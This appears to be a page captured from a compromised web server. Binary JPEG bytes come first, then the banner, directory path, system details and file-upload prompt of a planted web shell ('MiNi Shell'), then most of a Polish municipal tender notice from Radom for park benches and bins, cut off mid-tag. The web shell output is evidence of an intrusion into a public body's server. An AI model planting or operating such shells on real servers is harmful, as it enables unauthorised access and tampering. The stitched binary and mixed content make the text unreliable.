JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220906/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220906/0033551901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa elementów małej architektury w ramach projektów Budżetu Obywatelskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Usług Komunalnych w Radomiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 141256865</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sucha 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zuk.radom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.zuk.radom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> samorządowa jednostka organizacyjna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa elementów małej architektury w ramach projektów Budżetu Obywatelskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b6b3683-2ce6-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00335519</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00034443/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa elementów małej architektury w ramach projektów Budżetu Obywatelskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/658950 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem platformy zakupowej pod adresem: https://platformazakupowa.pl/transakcja/658950 i formularza „Wyślij wiadomość do Zamawiającego&#34;. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego&#34; po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego. Zamawiający dopuszcza, opcjonalnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zamowienia@zuk.radom.pl. Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do Zamawiającego”, nie za pośrednictwem adresu email.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z Rozdziałem XIII SWZ. Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz. 1320); dalej: &#34;Rozporządzenie w sprawie środków komunikacji&#34;), określa niezbędne wymagania sprzętowo aplikacyjne umożliwiające pracę na Platformie. tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d)	włączona obsługa JavaScript,<br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików pdf,<br/>f)	Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Sposób sporządzania oraz sposób przekazywania podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, wymagania techniczne dla dokumentów elektronicznych, o których mowa w art. 3 pkt 35 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 910/2014 z dnia 23 lipca 2014 r. w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym oraz uchylającego dyrektywę 1999/93/WE (Dz. Urz. UE L 257 z 28.08.2014, str. 73), zwanych dalej „dokumentami elektronicznymi”, zawierających podmiotowe środki dowodowe, oraz inne informacje, oświadczenia lub dokumenty, przekazywane w postępowaniu, oraz wymagania techniczne i organizacyjne użycia środków komunikacji elektronicznej służących do odbioru dokumentów elektronicznych, określa rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. poz. 2452)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (Dz. Urz. UE L 119 z 04.05.2016) informuję, iż:<br/>1)	Administratorem Pana/Pani danych osobowych jest Zakład Usług Komunalnych w Radomiu ul. Sucha 15, 26-600 Radom tel.: (48) 389 26 30<br/>2)	W Zakładzie Usług Komunalnych w Radomiu został wyznaczony Inspektor Ochrony Danych – Izabela Remjasz, z którym kontakt jest możliwy pod adresem korespondencyjnym Zakład Usług Komunalnych w Radomiu ul. Sucha 15, 26-600 Radom oraz pod adresem e-mail: iod.kontakt@zuk.radom.pl<br/>3)	Pana/Pani dane osobowe przetwarzane będą w celu w prowadzenia postępowań w sprawie zamówienia publicznego:<br/>•	na postawie przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych<br/>•	na podstawie Art. 6 ust. 1 lit. c przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji;<br/>•	na podstawie Art. 6 ust. 1 lit. f jako niezbędne do celów wynikających z prawnie uzasadnionych interesów realizowanych przez administratora. <br/>4)	Odbiorcami Pana/Pani danych osobowych będą: organy uprawnione na podstawie przepisów prawa do otrzymania Pana/Pani danych osobowych. odbiorcami Pana/Pani danych osobowych, osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP oraz Open Nexus Sp. z o.o. z siedzibą w Poznaniu ul. Bolesława Krzywoustego, 61-144 Poznań, zarejestrowana w Sądzie Rejonowym Poznań - Nowe Miasto i Wilda w Poznaniu, Wydział VIII Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS 0000335959, NIP 7792363577 jako właściciela Platformy Zakupowej, na której Administrator prowadzi postępowania o udzielenie zamówienia publicznego, działając pod adresem mail platformazakupowa.pl<br/>5)	Pana/Pani dane osobowe przechowywane będą przez okres niezbędny do realizacji wymienianych powyżej celów<br/> zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	Posiada Pan/Pani prawo do: <br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pana/Pani dotyczących; <br/>•	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pana/Pani danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pan/Pani, że przetwarzanie danych osobowych Pana/Pani dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7)	Nie przysługuje Panu/Pani prawo do:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>•	gdyż podstawą prawną przetwarzania Pana/Pani danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>8)	Ma Pan/Pani prawo wniesienia skargi do organu nadzorczego, tj. do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznane zostanie, że przetwarzanie Pana/Pani danych osobowych narusza przepisy prawa.<br/>9)	Pana/Pani dane osobowe nie będą przekazywane do państw pochodzących z poza Europejskiego Obszaru Gospodarczego (EOG) <br/>10)	Podanie danych osobowych Pana/Pani dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>11)	Jednocześnie Zamawiający przypomina o ciążącym na Panu/Pani obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>12)	Pana/Pani dane nie będą przetwarzane w sposób zautomatyzowany i nie będą poddawane profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.TP.26.4.2022.KM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa elementów małej architektury w ramach projektów Budżetu Obywatelskiego, część I obejmuje:<br/>40 szt. ławek parkowych z oparciem,<br/>20 szt. koszy na odpady,<br/>6 szt. leżaków parkowych.<br/>4 szt. stolików do leżaków<br/>Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 1 do SWZ.<br/>W przypadku kiedy Zamawiający w opisie przedmiotu zamówienia określa dopuszczalny minimalny / maksymalny zakres wymiarów, parametry oferowanych produktów winny mieścić się we wskazanych przez Zamawiającego zakresach pod rygorem odrzucenia oferty.<br/>Wykonawca dostarczy przedmiot zamówienia do siedziby Zamawiającego i dokona rozładunku we własnym zakresie w miejscu wskazanym przez Zamawiającego.<br/>Na przedmiot umowy Wykonawca udziela gwarancji. Minimalny okres gwarancji wynosi 24 miesiące.<br/>W przypadku gdy Zamawiający użył w opisie przedmiotu zamówienia nazw własnych produktów, materiałów należy je rozumieć jako przykładowe, ma to jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania i służy wskazaniu minimalnych / maksymalnych parametrów, cech użytkowych i funkcjonalnych wymaganych przez Zamawiającego. Dopuszcza się składanie ofert przy zastosowaniu rozwiązań równoważnych do opisanych w Załączniku nr 1 do SWZ. <br/>Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych.<br/>Kryteria równoważności: <br/>Pod pojęciem „równoważności” rozumie się oferowanie produktów, materiałów posiadających łącznie:<br/>a)	co najmniej te same cechy (tj. właściwości funkcjonalne i użytkowe), co podane w załączniku 1 do SWZ, <br/>b)	parametry techniczne na poziomie nie niższym niż wskazane przez Zamawiającego za wyjątkiem wymiaru odległości między listwami,<br/>c)	Zamawiający dopuszcza zaoferowanie produktów o rozszerzonych funkcjach i lepszych parametrach, pod warunkiem iż spełniają one minimalne wymagania określone w załączniku nr 1 do SWZ za wyjątkiem wymiaru odległości między listwami,<br/>d)	parametry techniczne na poziomie nie wyższym niż wskazane przez Zamawiającego dotyczące odległości między listwami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43325000-7 - Wyposażenie parków i placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37416000-7 - Sprzęt wypoczynkowy</p> <p class="mb-0">39113600-3 - Ławki</p> <p class="mb-0">44613800-8 - Pojemniki na tworzywa odpadowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	cena (C) - waga kryterium 60 %;<br/>2)	okres gwarancji (G) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>	1) cena (C) - waga 60 %<br/> cena najniższa brutto*<br/>	C =------------------------------------------------ x 100 pkt x 60 %<br/> cena oferty ocenianej brutto<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a)	podstawą przyznania punktów w kryterium „cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>	2) okres gwarancji (G) - waga 40 %<br/>punkty przydzielane będą zgodnie z poniższą tabelą:<br/>Okres udzielonej gwarancji (miesiące)	Liczba punktów<br/>36 - 20 pkt<br/>48 - 40 pkt<br/>a)	do obliczenia punktów za kryterium „okres gwarancji” Zamawiający przyjmie termin podany w Formularzu oferty załącznik nr 2 do SWZ;<br/>b)	okres udzielonej gwarancji liczony od dnia odbioru przedmiotu zamówienia;<br/>c)	wymagany minimalny okres udzielonej gwarancji wynosi 24 miesiące;<br/>d)	w przypadku, gdy Wykonawca nie wskaże w ogóle w ofercie minimalnego okresu gwarancji Zamawiający otrzyma 0 punktów. Tym samym Wykonawca zobowiązuje się do udzielenia pełnej gwarancji na okres 24 miesięcy;<br/>e)	Jeżeli Wykonawca poda w formularzu oferty okres gwarancji poniżej 24 miesięcy Zamawiający odrzuci taką ofertę jako niezgodną z SWZ;<br/>f)	Jeżeli Wykonawca poda okres gwarancji powyżej 48 miesięcy, Zamawiający przyzna ofercie Wykonawcy 40 pkt, a do oferty zostanie przyjęty okres gwarancji zaproponowany przez Wykonawcę.<br/>3)	Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych kryteriach <br/>PŁ= C+G<br/>	PŁ- łączna liczba punktów <br/>C- liczba punktów w kryterium Cena <br/>G- liczba punktów w kryterium okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa elementów małej architektury w ramach projektów Budżetu Obywatelskiego, część II obejmuje:<br/>6 szt. ławek wiedeńskich parkowych z oparciem,<br/>4 szt. koszy na odpady,<br/>2 szt. ławek z oparciem, <br/>4 szt. ławek bez oparcia, <br/>1 szt. fotela obrotowego z oparciem, <br/>2 szt. leżaka obrotowego z oparciem, <br/>1 szt. siedziska,<br/>1 szt. kosza.<br/>Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 1 do SWZ.<br/>W przypadku kiedy Zamawiający w opisie przedmiotu zamówienia określa dopuszczalny minimalny / maksymalny zakres wymiarów, parametry oferowanych produktów winny mieścić się we wskazanych przez Zamawiającego zakresach pod rygorem odrzucenia oferty.<br/>Wykonawca dostarczy przedmiot zamówienia do siedziby Zamawiającego i dokona rozładunku we własnym zakresie w miejscu wskazanym przez Zamawiającego.<br/>Na przedmiot umowy Wykonawca udziela gwarancji. Minimalny okres gwarancji wynosi 24 miesiące.<br/>W przypadku gdy Zamawiający użył w opisie przedmiotu zamówienia nazw własnych produktów, materiałów należy je rozumieć jako przykładowe, ma to jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania i służy wskazaniu minimalnych / maksymalnych parametrów, cech użytkowych i funkcjonalnych wymaganych przez Zamawiającego. Dopuszcza się składanie ofert przy zastosowaniu rozwiązań równoważnych do opisanych w Załączniku nr 1 do SWZ. <br/>Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych.<br/>Kryteria równoważności: <br/>Pod pojęciem „równoważności” rozumie się oferowanie produktów, materiałów posiadających łącznie:<br/>a)	co najmniej te same cechy (tj. właściwości funkcjonalne i użytkowe), co podane w załączniku 1 do SWZ, <br/>b)	parametry techniczne na poziomie nie niższym niż wskazane przez Zamawiającego za wyjątkiem wymiaru odległości między listwami,<br/>c)	Zamawiający dopuszcza zaoferowanie produktów o rozszerzonych funkcjach i lepszych parametrach, pod warunkiem iż spełniają one minimalne wymagania określone w załączniku nr 1 do SWZ za wyjątkiem wymiaru odległości między listwami,<br/>d)	parametry techniczne na poziomie nie wyższym niż wskazane przez Zamawiającego dotyczące odległości między listwami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43325000-7 - Wyposażenie parków i placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p 